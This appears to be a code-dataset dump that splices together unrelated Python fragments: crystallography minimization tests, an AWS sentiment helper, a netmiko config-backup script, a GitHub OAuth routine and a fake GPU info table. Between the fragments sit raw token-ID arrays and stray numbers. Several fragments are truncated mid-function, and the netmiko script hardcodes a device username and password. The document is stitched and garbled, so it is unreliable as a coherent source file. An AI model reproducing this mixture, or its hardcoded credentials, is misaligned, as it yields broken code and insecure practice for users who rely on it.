exercise_02(): """ Exercise maptbx.target_and_gradients_diffmap in action: minimization (bigger model). """ xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 50) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.8) start_error = flex.mean(xrs.distances(other = xrs_sh)) assert start_error>0.7 map_current, miller_array, crystal_gridding = compute_map( xray_structure = xrs_sh) for step in [miller_array.d_min()/4]*5: minimized = minimization.run( xray_structure = xrs_sh, miller_array = miller_array, crystal_gridding = crystal_gridding, map_target = map_target, max_iterations = 500, min_iterations = 25, step = step, geometry_restraints_manager = None, target_type = "diffmap") xrs_sh = minimized.xray_structure map_current = minimized.map_current final_error = flex.mean(xrs.distances(other = minimized.xray_structure)) assert approx_equal(start_error, 0.8, 1.e-3) assert final_error < 1.e-4 def exercise_03(): """ Exercise maptbx.target_and_gradients_simple. """ xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 50) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.8) # t1 = maptbx.real_space_target_simple( unit_cell = xrs.unit_cell(), density_map = map_target, sites_cart = xrs_sh.sites_cart(), selection = flex.bool(xrs_sh.scatterers().size(), True)) g1 = maptbx.real_space_gradients_simple( unit_cell = xrs.unit_cell(), density_map = map_target, sites_cart = xrs_sh.sites_cart(), delta = 0.25, selection = flex.bool(xrs_sh.scatterers().size(), True)) o = maptbx.target_and_gradients_simple( unit_cell = xrs.unit_cell(), map_target = map_target, sites_cart = xrs_sh.sites_cart(), delta = 0.25, selection = flex.bool(xrs_sh.scatterers().size(), True)) assert approx_equal(t1, o.target()) for gi,gj in zip(g1, o.gradients()): assert approx_equal(gi, gj) def exercise_04(): """ Exercise maptbx.target_and_gradients_simple in action: minimization (bigger model). """ xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 150) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.3) start_error = flex.mean(xrs.distances(other = xrs_sh)) assert start_error > 0.29 map_current, miller_array, crystal_gridding = compute_map( xray_structure = xrs_sh) xrs_sh_ = xrs_sh.deep_copy_scatterers() minimized = minimization.run( xray_structure = xrs_sh_, miller_array = miller_array, crystal_gridding = crystal_gridding, map_target = map_target, max_iterations = 500, min_iterations = 25, step = 0.5, geometry_restraints_manager = None, target_type = "simple") xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart) final_error = flex.mean(xrs.distances(other = xrs_sh_)) assert final_error < 0.015 if (__name__ == "__main__"): exercise_00() exercise_01() exercise_02() exercise_03() exercise_04()
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 6738, 269, 310, 65, 87, 13, 18747, 62, 17989, 1330, 7059, 198, 6738, 269, 310, 65, 87, 1330, 2124, 2433, 198, 6738, 269, 310, 65, 87, 1330, 15121, 198, 6738, 269, 310, 65, 87, 1330, 285, 2...
2.111644
2,920
""" LED matrix """ __all__ = ['Matrix'] from .colors import Color, on, off from .fonts import font_6x8
[ 37811, 12365, 17593, 198, 37811, 198, 834, 439, 834, 796, 37250, 46912, 20520, 198, 198, 6738, 764, 4033, 669, 1330, 5315, 11, 319, 11, 572, 198, 6738, 764, 10331, 82, 1330, 10369, 62, 21, 87, 23, 628 ]
2.837838
37
from pytest import raises from datek_app_utils.env_config.base import BaseConfig from datek_app_utils.env_config.errors import InstantiationForbiddenError
[ 6738, 12972, 9288, 1330, 12073, 198, 198, 6738, 3128, 74, 62, 1324, 62, 26791, 13, 24330, 62, 11250, 13, 8692, 1330, 7308, 16934, 198, 6738, 3128, 74, 62, 1324, 62, 26791, 13, 24330, 62, 11250, 13, 48277, 1330, 24470, 3920, 1890, 3797...
3.511111
45
# -*- coding: utf-8 -*- # Name: comprehend # Version: 0.1a2 # Owner: Ruslan Korniichuk # Maintainer(s): import boto3 def get_sentiment(text, language_code='en'): """Get sentiment. Inspects text and returns an inference of the prevailing sentiment (positive, neutral, mixed, or negative). Args: text: UTF-8 text string. Each string must contain fewer that 5,000 bytes of UTF-8 encoded characters (required | type: str). language_code: language of text (not required | type: str | default: 'en'). Returns: sentiment: sentiment: positive, neutral, mixed, or negative (type: str). """ comprehend = boto3.client('comprehend') text = prepare_text(text) try: r = comprehend.detect_sentiment(Text=text, LanguageCode='en') except Exception as e: raise e sentiment = r['Sentiment'].lower() return sentiment # Example. Get sentiment of text below: # "I ordered a small and expected it to fit just right but it was a little bit # more like a medium-large. It was great quality. It's a lighter brown than # pictured but fairly close. Would be ten times better if it was lined with # cotton or wool on the inside." # text = "I ordered a small and expected it to fit just right but it was a \ # little bit more like a medium-large. It was great quality. It's a \ # lighter brown than pictured but fairly close. Would be ten times \ # better if it was lined with cotton or wool on the inside." # get_sentiment(text)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 6530, 25, 24772, 198, 2, 10628, 25, 657, 13, 16, 64, 17, 198, 2, 23853, 25, 9223, 9620, 509, 1211, 72, 488, 2724, 198, 2, 337, 2913, 10613, 7, 82, 2599, 198, ...
2.84657
554
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'configuredialog.ui' ## ## Created by: Qt User Interface Compiler version 5.15.2 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide2.QtCore import * from PySide2.QtGui import * from PySide2.QtWidgets import *
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 29113, 29113, 14468, 198, 2235, 5178, 7560, 422, 3555, 12454, 2393, 705, 11250, 1522, 498, 519, 13, 9019, 6, 198, 2235, 198, 2235, 15622, 416, 25, 33734, 11787, 264...
4.163793
116
import base64 import tempfile import requests from osbot_aws.apis import Secrets from osbot_aws.apis.Lambdas import Lambdas
[ 11748, 2779, 2414, 198, 11748, 20218, 7753, 198, 11748, 7007, 198, 6738, 220, 220, 28686, 13645, 62, 8356, 13, 499, 271, 220, 220, 220, 220, 220, 220, 220, 1330, 23561, 198, 6738, 220, 220, 28686, 13645, 62, 8356, 13, 499, 271, 13, ...
2.440678
59
from sys import argv from getopt import getopt from os import R_OK, access from string import Template DEFAULT_DATASET_FILE_PATH = "dataset/data.csv" DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code', 'city'] DEFAULT_VISU = ["scatter_plot", "histogram"] DEFAULT_RANGE = [0, 1000]
[ 6738, 25064, 1330, 1822, 85, 198, 6738, 651, 8738, 1330, 651, 8738, 198, 6738, 28686, 1330, 371, 62, 11380, 11, 1895, 198, 6738, 4731, 1330, 37350, 198, 198, 7206, 38865, 62, 35, 1404, 1921, 2767, 62, 25664, 62, 34219, 796, 366, 19608...
2.424837
153
# Must run example4.py first # Read an Excel sheet and save running config of devices using pandas import pandas as pd from netmiko import ConnectHandler # Read Excel file of .xlsx format data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0) # Convert data to data frame df = pd.DataFrame(data=data) # Conevrt data frame from MGMT IP Address to a list device_ip_list = df.iloc[:, 1].tolist() # Define devices variable devices = [] for ip in device_ip_list: devices.append( { "device_type": "cisco_ios", # must be the same for all devices "ip": ip, "username": "developer", # must be the same for all devices "password": "C1sco12345", # must be the same for all devices "port": 22, # must be the same for all devices # If port for all devices is not 22 you will get an error "fast_cli": False, } ) for device in devices: # Create a connection instance with ConnectHandler(**device) as net_connect: # hostname of the current device hostname = net_connect.send_command( command_string="show version", use_textfsm=True )[0]["hostname"] run_cfg: str = net_connect.send_command(command_string="show running-config") # Create .txt for each running configuration of each device with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile: outfile.write(run_cfg.lstrip()) print("Done")
[ 2, 12039, 1057, 1672, 19, 13, 9078, 717, 198, 2, 4149, 281, 24134, 9629, 290, 3613, 2491, 4566, 286, 4410, 1262, 19798, 292, 198, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 6738, 2010, 76, 12125, 1330, 8113, 25060, 198, 198, 2,...
2.542662
586
# Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 VERIFIED_OP_REFERENCES = [ 'Abs-1', 'Acos-1', 'Add-1', 'Asin-1', 'Asinh-3', 'Assign-6', 'AvgPool-1', 'BatchNormInference-5', 'BatchToSpace-2', 'BinaryConvolution-1', 'Broadcast-1', 'Broadcast-3', 'Bucketize-3', 'Ceiling-1', 'CTCGreedyDecoder-1', 'CTCGreedyDecoderSeqLen-6', 'Concat-1', 'Convert-1', 'ConvertLike-1', 'Convolution-1', 'Constant-1', 'Cos-1', 'Cosh-1', 'DeformableConvolution-1', 'DeformablePSROIPooling-1', 'DepthToSpace-1', 'DetectionOutput-1', 'Divide-1', 'ExperimentalDetectronDetectionOutput-6', 'ExperimentalDetectronGenerateProposalsSingleImage-6', 'ExperimentalDetectronPriorGridGenerator-6', 'ExperimentalDetectronROIFeatureExtractor-6', 'ExperimentalDetectronTopKROIs-6', 'FakeQuantize-1', 'Floor-1' 'FloorMod-1' 'GRUSequence-5', 'Gather-1', 'GatherElements-6', 'GatherND-5', 'Gelu-7', 'GRN-1', 'GroupConvolution-1', 'GroupConvolutionBackpropData-1', 'GRUSequence-5', 'HSigmoid-5', 'HSwish-4', 'HardSigmoid-1', 'Interpolate-4', 'LRN-1', 'LSTMCell-4', 'LSTMSequence-5', 'LogSoftmax-5', 'Loop-5', 'MVN-6', 'Maximum-1', 'MaxPool-1', 'Mish-4', 'Multiply-1', 'Negative-1', 'NonMaxSuppression-4', 'NonMaxSuppression-5', 'NonZero-3', 'NormalizeL2-1', 'PriorBox-1', 'PriorBoxClustered-1', 'Proposal-1', 'Proposal-4', 'PSROIPooling-1', 'RNNSequence-5', 'ROIAlign-3', 'ROIPooling-2', 'Range-1', 'Range-4', 'ReadValue-6', 'ReduceL1-4', 'ReduceL2-4', 'ReduceLogicalAnd-1', 'ReduceLogicalOr-1', 'ReduceMax-1', 'ReduceMean-1', 'ReduceMin-1', 'ReduceProd-1', 'ReduceSum-1', 'RegionYOLO-1', 'Relu-1', 'ReorgYOLO-2', 'Result-1' 'Round-5', 'SpaceToDepth-1', 'ScatterNDUpdate-4', 'Select-1', 'ShapeOf-1', 'ShapeOf-3', 'ShuffleChannels-1', 'Sigmoid-1', 'Sign-1', 'Sin-1', 'Sinh-1' 'SoftPlus-4', 'Softmax-1', 'Split-1', 'Squeeze-1', 'StridedSlice-1', 'Subtract-1', 'Swish-4', 'Tile-1', 'TopK-1', 'TopK-3', 'Transpose-1', 'Unsqueeze-1', 'VariadicSplit-1', ]
[ 2, 15069, 357, 34, 8, 33448, 8180, 10501, 198, 2, 30628, 55, 12, 34156, 12, 33234, 7483, 25, 24843, 12, 17, 13, 15, 198, 198, 5959, 28343, 62, 3185, 62, 2200, 24302, 24181, 1546, 796, 685, 198, 220, 220, 220, 705, 24849, 12, 16, ...
1.837442
1,298
"""Utilities for interacting with GitHub""" import os import json import webbrowser import stat import sys from git import Repo from .context import Context event_dict = { "added_to_project": ( lambda event: "{} added the issue to a project.".format(event["actor"]["login"]) ), "assigned": ( lambda event: "{} assigned the issue to {}.".format( event["actor"]["login"], event["assignee"]["login"] ) ), "closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])), "converted_note_to_issue": ( lambda event: "{} created this issue from a note.".format( event["actor"]["login"] ) ), "demilestoned": (lambda event: "The issue was removed from a milestone."), "head_ref_deleted": (lambda event: "The pull request's branch was deleted."), "head_ref_restored": (lambda event: "The pull request's branch was restored."), "labelled": ( lambda event: "{} added {} label to the issue.".format( event["actor"]["login"], event["label"] ) ), "locked": ( lambda event: "The issue was locked by {}.".format(event["actor"]["login"]) ), "mentioned": ( lambda event: "{} was mentioned in the issue's body.".format( event["actor"]["login"] ) ), "marked_as_duplicate": ( lambda event: "The issue was marked duplicate by {}.".format( event["actor"]["login"] ) ), "merged": ( lambda event: "The issue was merged by {}.".format(event["actor"]["login"]) ), "milestoned": (lambda event: "The issue was added to a milestone."), "moved_columns_in_project": ( lambda event: "The issue was moved between columns in a project board." ), "referenced": (lambda event: "The issue was referenced from a commit message."), "renamed": (lambda event: "The title of the issue was changed."), "reopened": ( lambda event: "The issue was reopened by {}".format(event["actor"]["login"]) ), "review_dismissed": ( lambda event: "{} dismissed a review from the pull request.".format( event["actor"]["login"] ) ), "review_requested": ( lambda event: "{} requested review from the subject on this pull request.".format( event["actor"]["login"] ) ), "review_request_removed": ( lambda event: "{} removed the review request for the subject on this pull request.".format( event["actor"]["login"] ) ), "subscribed": ( lambda event: "{} subscribed to receive notifications for the issue.".format( event["actor"]["login"] ) ), "transferred": (lambda event: "The issue was transferred to another repository."), "unassigned": ( lambda event: "{} was unassigned from the issue.".format( event["actor"]["login"] ) ), "unlabeled": (lambda event: "A label was removed from the issue."), "unlocked": ( lambda event: "The issue was unlocked by {}".format(event["actor"]["login"]) ), "unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."), "user_blocked": (lambda event: "A user was blocked from the organization."), } def authorize(ghub, reauthorize=False, fromenv=False): """Authorize a user for GHub Keyword arguments: ghub -- the ghub object that needs authorization reauthorize -- performs authorization again (default False) """ if fromenv: oauth_data = json.loads(os.environ["GHUB_CRED"]) ghub.oauth_data = oauth_data ghub.github.token = oauth_data return True if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize: authorization_base_url = "https://github.com/login/oauth/authorize" token_url = "https://github.com/login/oauth/access_token" authorization_url, _ = ghub.github.authorization_url(authorization_base_url) webbrowser.open(authorization_url) print("Please visit this site and grant access: {}".format(authorization_url)) redirect_response = input( "Please enter the URL you were redirected to after granting access: " ) try: response = ghub.github.fetch_token( token_url, client_secret=ghub.client_secret, authorization_response=redirect_response, ) except Exception as e: print(e) print( "Network Error. Make sure you have a working internet connection and try again." ) sys.exit(1) if not os.path.isdir(ghub.data_path): os.makedirs(ghub.data_path) data_file = open(ghub.data_path / ghub.auth_filename, "w+") json.dump(response, data_file) data_file.close() os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR) ghub.oauth_data = response return True else: data_file = open(ghub.data_path / ghub.auth_filename, "r") oauth_data = json.loads(data_file.read()) data_file.close() ghub.oauth_data = oauth_data ghub.github.token = oauth_data return True
[ 37811, 18274, 2410, 329, 24986, 351, 21722, 37811, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 3992, 40259, 198, 11748, 1185, 198, 11748, 25064, 198, 6738, 17606, 1330, 1432, 78, 198, 198, 6738, 764, 22866, 1330, 30532, 198, 198, 15...
2.404891
2,208
# Generated by Django 3.0.7 on 2020-09-18 05:52 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import multiselectfield.db.fields
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 22, 319, 12131, 12, 2931, 12, 1507, 8870, 25, 4309, 198, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 198, 11748, 42625, 14...
3.080645
62
import pytest import gen from dcos_installer import cli
[ 11748, 12972, 9288, 198, 198, 11748, 2429, 198, 6738, 288, 6966, 62, 17350, 263, 1330, 537, 72, 628, 628 ]
3.157895
19
#!/usr/bin/env python3 import sys from random import randint import os try: import networkx as nx except: print("gPrint#-1#" + "netwrokx not installed for " + sys.executable) sys.stdout.flush() try: import igraph as ig except: print("gPrint#-1#" + "igraph not installed for " + sys.executable) import xml.etree.cElementTree as ET import math # debugging = False def rgbFormatter(colorRGB): r = colorRGB[0] g = colorRGB[1] b = colorRGB[2] s = "rgb" s += "(" + str(r).rstrip() + "," + \ str(g).rstrip() + "," + str(b).rstrip() + ")" return s.rstrip() def hexFormatter(colorHex): s = "hex" if colorHex[0] == "#": colorHex = colorHex[1:] s += "("+str(colorHex).rstrip() + ")" return s.rstrip() def vertexId(vertex): if isinstance(vertex, Vertex): return vertex.getId() return vertex def edgeId(edge): if isinstance(edge, Edge): return edge.getId() return edge def extractIdFromProperties(stringFromGralog): strings = stringFromGralog.split(",") for string in strings: propVal = string.split("=") if propVal[0] == "id": return propVal[1] return None def edgeSplitter(edge): if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip() if type(edge) == int: # edge is given by id return str(edge).rstrip() return str(edge.getId()).rstrip()#edge has type Edge
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 25064, 198, 6738, 4738, 1330, 43720, 600, 198, 11748, 28686, 198, 28311, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1330, 3127, 87, 355, 299, 87, 198, 16341, 25, 198...
2.076456
824
# -*- coding: utf-8 -*- """Define the base module for server test.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import sys from influxdb.tests import using_pypy from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance from influxdb.client import InfluxDBClient if not using_pypy: from influxdb.dataframe_client import DataFrameClient
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 7469, 500, 262, 2779, 8265, 329, 4382, 1332, 526, 15931, 198, 198, 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 11593, 37443, 834, 1330, 7297, 198, ...
3.347518
141
# -*- coding: utf-8 -*- #------------------------------------------------------------------------------ # file: $Id$ # auth: Philip J Grabner <grabner@cadit.com> # date: 2013/10/21 # copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved. #------------------------------------------------------------------------------ # todo: this could be smarter... for example, it could: # - detect when references resolve to the same content, but # by different Content-IDs # - detect when multipart sections could collapse to the same # semantic structure from __future__ import absolute_import import unittest, email from .util import smtpHeaderFormat #------------------------------------------------------------------------------ def canonicalHeaders(message, ignore=None): ''' Returns a canonical string representation of the `message` headers, with the following changes made: * The MIME boundary specified in the "Content-Type" header, if specified, removed. * Any headers listed in `ignore` are removed. :Parameters: ignore : list(str), optional, default: ['Content-Transfer-Encoding'] List of headers that should not be included in the canonical form. ''' if ignore is None: ignore = ['Content-Transfer-Encoding'] ignore = [key.lower() for key in ignore] hdrs = {key.lower(): '; '.join(sorted(message.get_all(key))) for key in message.keys() if key.lower() not in ignore} hdrs['content-type'] = '; '.join(['='.join(filter(None, pair)) for pair in message.get_params() if pair[0].lower() != 'boundary']) return '\n'.join([ smtpHeaderFormat(key) + ': ' + hdrs[key] for key in sorted(hdrs.keys())]) + '\n' #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ # end of $Id$ #------------------------------------------------------------------------------
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 10097, 26171, 198, 2, 2393, 25, 720, 7390, 3, 198, 2, 6284, 25, 14576, 449, 25339, 1008, 1279, 32393, 1008, 31, 66, 324, 270, 13, 785, 29, 198, 2, 3128, 25, 221...
3.579545
616
# Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This dictionary of GPU information was captured from a run of # Telemetry on a Linux workstation with NVIDIA GPU. It helps test # telemetry.internal.platform's GPUInfo class, and specifically the # attributes it expects to find in the dictionary; if the code changes # in an incompatible way, tests using this fake GPU info will begin # failing, indicating this fake data must be updated. # # To regenerate it, import pdb in # telemetry/internal/platform/gpu_info.py and add a call to # pdb.set_trace() in GPUInfo.FromDict before the return statement. # Print the attrs dictionary in the debugger and copy/paste the result # on the right-hand side of this assignment. Then run: # # pyformat [this file name] | sed -e "s/'/'/g" # # and put the output into this file. FAKE_GPU_INFO = { 'feature_status': { 'flash_stage3d': 'enabled', 'gpu_compositing': 'enabled', 'video_decode': 'unavailable_software', 'flash_3d': 'enabled', 'webgl': 'enabled', 'video_encode': 'enabled', 'multiple_raster_threads': 'enabled_on', '2d_canvas': 'unavailable_software', 'rasterization': 'disabled_software', 'flash_stage3d_baseline': 'enabled' }, 'aux_attributes': { 'optimus': False, 'sandboxed': True, 'basic_info_state': 1, 'adapter_luid': 0.0, 'driver_version': '331.79', 'direct_rendering': True, 'amd_switchable': False, 'context_info_state': 1, 'process_crash_count': 0, 'pixel_shader_version': '4.40', 'gl_ws_version': '1.4', 'can_lose_context': False, 'driver_vendor': 'NVIDIA', 'max_msaa_samples': '64', 'software_rendering': False, 'gl_version': '4.4.0 NVIDIA 331.79', 'gl_ws_vendor': 'NVIDIA Corporation', 'vertex_shader_version': '4.40', 'initialization_time': 1.284043, 'gl_reset_notification_strategy': 33362, 'gl_ws_extensions': 'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig ' 'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control ' 'GLX_EXT_swap_control GLX_EXT_swap_control_tear ' 'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age ' 'GLX_ARB_create_context GLX_ARB_create_context_profile ' 'GLX_EXT_create_context_es_profile ' 'GLX_EXT_create_context_es2_profile ' 'GLX_ARB_create_context_robustness GLX_ARB_multisample ' 'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group' ' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage ' 'GLX_NV_copy_image GLX_NV_video_capture ', 'gl_renderer': 'Quadro 600/PCIe/SSE2', 'driver_date': '', 'gl_vendor': 'NVIDIA Corporation', 'gl_extensions': 'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays ' 'GL_ARB_base_instance GL_ARB_blend_func_extended ' 'GL_ARB_buffer_storage GL_ARB_clear_buffer_object ' 'GL_ARB_clear_texture GL_ARB_color_buffer_float ' 'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage' ' GL_ARB_conservative_depth GL_ARB_compute_shader ' 'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer ' 'GL_ARB_copy_image GL_ARB_debug_output ' 'GL_ARB_depth_buffer_float GL_ARB_depth_clamp ' 'GL_ARB_depth_texture GL_ARB_draw_buffers ' 'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect ' 'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced ' 'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility ' 'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location ' 'GL_ARB_explicit_uniform_location ' 'GL_ARB_fragment_coord_conventions ' 'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program ' 'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader ' 'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object ' 'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 ' 'GL_ARB_get_program_binary GL_ARB_gpu_shader5 ' 'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel ' 'GL_ARB_half_float_vertex GL_ARB_imaging ' 'GL_ARB_indirect_parameters GL_ARB_instanced_arrays ' 'GL_ARB_internalformat_query GL_ARB_internalformat_query2 ' 'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment ' 'GL_ARB_map_buffer_range GL_ARB_multi_bind ' 'GL_ARB_multi_draw_indirect GL_ARB_multisample ' 'GL_ARB_multitexture GL_ARB_occlusion_query ' 'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object ' 'GL_ARB_point_parameters GL_ARB_point_sprite ' 'GL_ARB_program_interface_query GL_ARB_provoking_vertex ' 'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness ' 'GL_ARB_sample_shading GL_ARB_sampler_objects ' 'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects ' 'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding ' 'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote ' 'GL_ARB_shader_image_load_store GL_ARB_shader_image_size ' 'GL_ARB_shader_objects GL_ARB_shader_precision ' 'GL_ARB_query_buffer_object ' 'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine' ' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 ' 'GL_ARB_shading_language_420pack ' 'GL_ARB_shading_language_include ' 'GL_ARB_shading_language_packing GL_ARB_shadow ' 'GL_ARB_stencil_texturing GL_ARB_sync ' 'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp ' 'GL_ARB_texture_buffer_object ' 'GL_ARB_texture_buffer_object_rgb32 ' 'GL_ARB_texture_buffer_range GL_ARB_texture_compression ' 'GL_ARB_texture_compression_bptc ' 'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map ' 'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add ' 'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar ' 'GL_ARB_texture_env_dot3 GL_ARB_texture_float ' 'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge ' 'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample ' 'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels ' 'GL_ARB_texture_query_lod GL_ARB_texture_rectangle ' 'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui ' 'GL_ARB_texture_stencil8 GL_ARB_texture_storage ' 'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle ' 'GL_ARB_texture_view GL_ARB_timer_query ' 'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 ' 'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix ' 'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra ' 'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit ' 'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object ' 'GL_ARB_vertex_program GL_ARB_vertex_shader ' 'GL_ARB_vertex_type_10f_11f_11f_rev ' 'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array ' 'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float ' 'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add' ' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform ' 'GL_EXT_blend_color GL_EXT_blend_equation_separate ' 'GL_EXT_blend_func_separate GL_EXT_blend_minmax ' 'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array ' 'GL_EXT_Cg_shader GL_EXT_depth_bounds_test ' 'GL_EXT_direct_state_access GL_EXT_draw_buffers2 ' 'GL_EXT_draw_instanced GL_EXT_draw_range_elements ' 'GL_EXT_fog_coord GL_EXT_framebuffer_blit ' 'GL_EXT_framebuffer_multisample ' 'GL_EXTX_framebuffer_mixed_formats ' 'GL_EXT_framebuffer_multisample_blit_scaled ' 'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB ' 'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters ' 'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays ' 'GL_EXT_packed_depth_stencil GL_EXT_packed_float ' 'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object ' 'GL_EXT_point_parameters GL_EXT_provoking_vertex ' 'GL_EXT_rescale_normal GL_EXT_secondary_color ' 'GL_EXT_separate_shader_objects ' 'GL_EXT_separate_specular_color ' 'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs ' 'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D' ' GL_EXT_texture_array GL_EXT_texture_buffer_object ' 'GL_EXT_texture_compression_dxt1 ' 'GL_EXT_texture_compression_latc ' 'GL_EXT_texture_compression_rgtc ' 'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map ' 'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine ' 'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic ' 'GL_EXT_texture_integer GL_EXT_texture_lod ' 'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp ' 'GL_EXT_texture_object GL_EXT_texture_shared_exponent ' 'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode ' 'GL_EXT_texture_storage GL_EXT_texture_swizzle ' 'GL_EXT_timer_query GL_EXT_transform_feedback2 ' 'GL_EXT_vertex_array GL_EXT_vertex_array_bgra ' 'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object ' 'GL_EXT_import_sync_object GL_IBM_rasterpos_clip ' 'GL_IBM_texture_mirrored_repeat GL_KHR_debug ' 'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect ' 'GL_NV_blend_equation_advanced GL_NV_blend_square ' 'GL_NV_compute_program5 GL_NV_conditional_render ' 'GL_NV_copy_depth_to_color GL_NV_copy_image ' 'GL_NV_depth_buffer_float GL_NV_depth_clamp ' 'GL_NV_draw_texture GL_NV_ES1_1_compatibility ' 'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer ' 'GL_NV_fog_distance GL_NV_fragment_program ' 'GL_NV_fragment_program_option GL_NV_fragment_program2 ' 'GL_NV_framebuffer_multisample_coverage ' 'GL_NV_geometry_shader4 GL_NV_gpu_program4 ' 'GL_NV_gpu_program4_1 GL_NV_gpu_program5 ' 'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 ' 'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent ' 'GL_NV_multisample_coverage GL_NV_multisample_filter_hint ' 'GL_NV_occlusion_query GL_NV_packed_depth_stencil ' 